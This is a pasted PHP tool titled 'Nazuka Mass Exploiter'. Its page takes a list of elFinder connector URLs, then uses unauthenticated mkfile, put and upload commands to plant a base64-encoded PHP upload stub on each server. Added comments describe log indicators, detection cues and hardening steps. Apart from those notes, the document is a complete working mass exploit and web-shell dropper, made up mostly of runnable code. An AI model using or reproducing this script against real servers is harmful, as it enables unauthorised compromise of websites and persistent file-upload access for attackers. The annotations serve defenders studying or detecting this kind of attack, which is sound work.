
Nazuka Mass Exploiter

Berandal666 Apr 23rd, 2017 90 Never
  1. <html>
      <!-- Operator-facing page for the script below. The form has no action attribute, so it
           posts back to this same URL with two fields: "target" (a textarea holding a list of
           elFinder connector URLs, one per line) and "x" (the submit button). Nothing on the
           page restricts who may submit it. -->
  2. <title>Berandal</title>
  3. <style type="text/css">
  4. html {
  5.     text-align: center;
  6. }
  7. a {
  8.     text-decoration: none;
  9.     color: black;
  10. }
  11. </style>
  12. Nitip nick cok!<br>
  13. <h1>Berandal elFinder Auto Exploiter</h1>
  14. <form method="post">
  15. Target: <br>
  16. <textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize:
  17. none;"></textarea><br>
  18. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="SIKAT!">
  19. </form>
  20. </html>
  21. <?php
  22. # Berandal
  23. function ngirim($url, $isi) {
      # HTTP POST helper: sends $isi as the POST fields to $url with cURL and returns
      # whatever curl_exec() yields (the response body, because CURLOPT_RETURNTRANSFER is
      # set; false when the transfer fails). No error is checked or reported here.
      #
      # Traits of the traffic this produces, useful when reading web or proxy logs:
      #   - a fixed Firefox 32 / Windows NT 6.1 User-Agent string (weak indicator, since
      #     it is a plain constant that anyone reusing the script can change);
      #   - redirects are followed;
      #   - TLS peer and host verification are both switched off, so the request goes
      #     through regardless of the certificate the server presents;
      #   - cookies are read from and written to a file named 'coker_log', relative to
      #     the working directory of the host running this script.
      # The cURL handle is not closed anywhere in this function.
  24. $ch = curl_init ("$url");
  25.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  26.       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  27.       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  28.       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  29.       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  30.       curl_setopt ($ch, CURLOPT_POST, 1);
  31.       curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  32.       curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  33.       curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  34. $data3 = curl_exec ($ch);
  35. return $data3;
  36. }
  37. $target = explode("\r\n", $_POST['target']);
      # Driver. The posted textarea is split on CRLF into one elFinder connector URL per
      # entry; the entries are not validated. The loop below runs only when the submit
      # field "x" is present and truthy.
      #
      # What each listed connector receives, as visible in this block:
      #   1. GET  <connector>?cmd=mkfile&name=berandal.php&target=l1_Lw
      #   2. POST <connector> with cmd=put, target=l1_<base64 of the file name> and the
      #      PHP source as "content"
      #   3. only when the reply to step 2 does not contain the file name:
      #      POST <connector>?cmd=upload
      # The script treats a reply that contains the file name as success; it never
      # fetches the file back to confirm.
      #
      # Defender notes. These requests only have an effect where the connector accepts
      # file-management commands from unauthenticated clients and stores files under a
      # path the web server executes as PHP. Put the connector behind the application's
      # own authentication, switch off write commands the deployment does not need
      # (elFinder's "disabled" root option), restrict the file types the volume accepts,
      # and make the files directory non-executable in the web server configuration.
      # For detection, look in access logs for connector requests carrying cmd=mkfile,
      # cmd=put or cmd=upload that name a .php file, and for new .php files under the
      # elFinder files directory. The name berandal.php and the marker words in the
      # stub are constants of this copy of the script, so treat them as weak indicators.
  38. if($_POST['x']) {
  39.     foreach($target as $korban) {
  40.         $nama_doang = "berandal.php";
              # Base64 blob: decodes to a short PHP stub that shows a file-upload form and
              # copies a posted file into its own directory, printing "berhasil" or
              # "gagal" as the result. Any file matching it on a server is evidence of a
              # successful write, not just an attempt.
  41.         $isi_nama_doang =
  42. "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1
  43. lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV
  44. 0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  45.         $decode_isi = base64_decode($isi_nama_doang);
  46.         $encode = base64_encode($nama_doang);
              # Side effect on the host running this script: the decoded stub is also
              # written to berandal.php in the current working directory, once per loop
              # iteration; the file handle is never closed in this block.
  47.         $fp = fopen($nama_doang,"w");
  48.         fputs($fp, $decode_isi);
              # The submitted URL is echoed into the operator's page as given.
  49.         echo "[!] <a href='$korban' target='_blank'>$korban</a> <br>";
  50.         echo "# Upload[1] ......<br>";
              # Step 1: file-creation request; the response ($b) is not inspected.
  51.         $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  52.         $b = file_get_contents("$url_mkfile");
              # Step 2 body: writes the stub's source into the file created in step 1.
  53.         $post1 = array(
  54.                 "cmd" => "put",
  55.                 "target" => "l1_$encode",
  56.                 "content" => "$decode_isi",
  57.                 );
              # Step 3 body: a fixed "current" value plus the local file reference; what the
              # connector does with "current" is not shown on this page.
  58.         $post2 = array(
  59.                 "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  60.                 "upload[]" => "@$nama_doang",);
  61.         $output_mkfile = ngirim("$korban", $post1);
              # Success test is a substring match of the file name in the response body.
  62.         if(preg_match("/$nama_doang/", $output_mkfile)) {
  63.             echo "# Upload Sukses 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  64.         } else {
  65.             echo "# Upload Gagal Cok! 1 <br># Uploading 2..<br>";
                  # Fallback: the upload command is tried only after the put attempt's reply
                  # lacked the file name, so a log showing cmd=upload from the same client
                  # right after cmd=put suggests the first write was refused.
  66.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
  67.             if(preg_match("/$nama_doang/", $upload_ah)) {
  68.                 echo "# Upload Sukses 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
  69.             } else {
  70.                 echo "# Upload Gagal Lagi Cok! 2<br><br>";
  71.             }
  72.         }
  73.     }
  74. }
  75. ?>